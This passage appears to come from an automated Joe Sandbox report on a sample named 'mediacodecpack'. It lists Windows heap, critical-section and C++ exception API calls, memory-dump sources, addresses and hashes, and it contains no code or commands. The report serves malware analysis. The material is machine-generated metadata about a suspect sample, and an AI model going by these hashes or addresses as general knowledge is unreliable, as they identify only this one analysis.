                                                                                • Opcode Fuzzy Hash: 1bfa5551ed2acea7caf79ecd2f05dc53ac20a64202d9175dbf38ac29f0b8ec59
                                                                                • Instruction Fuzzy Hash: 2CE08632D042105B82107B78BC4868EBB94DB41271F208B6AECBD833E0EA309D548BD6
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03BD8
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D03BED
                                                                                  • Part of subcall function 02D114C7: std::exception::exception.LIBCMT ref: 02D114D1
                                                                                  • Part of subcall function 02D0965B: __EH_prolog.LIBCMT ref: 02D09660
                                                                                  • Part of subcall function 02D0965B: __CxxThrowException@8.LIBCMT ref: 02D09689
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: 220ec069ef1cfdc6e143f36a47aa3fd3ffbc0d86147f9688fb14ac4585da44c5
                                                                                • Instruction ID: bf652b8e8549b606702faa00ce19b6cd2729824305010572f0b0900c668f3b5f
                                                                                • Opcode Fuzzy Hash: 220ec069ef1cfdc6e143f36a47aa3fd3ffbc0d86147f9688fb14ac4585da44c5
                                                                                • Instruction Fuzzy Hash: BFE0DF30900148DBC704EF94E182BBCB771EF22708F0080ADED0A137A0CB314D09CE91
                                                                                APIs
                                                                                • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
                                                                                • HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 3499195154-0
                                                                                • Opcode ID: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                • Instruction ID: 2adbec297c34dc3d5fc58a6281b1bdaad71761cfda4098cfa9d0d345734132fa
                                                                                • Opcode Fuzzy Hash: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                • Instruction Fuzzy Hash: 2D114C70250701DFD7308F28EE85E127BB5F7867207108B3DEAA1E25E0D7359845CB08
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2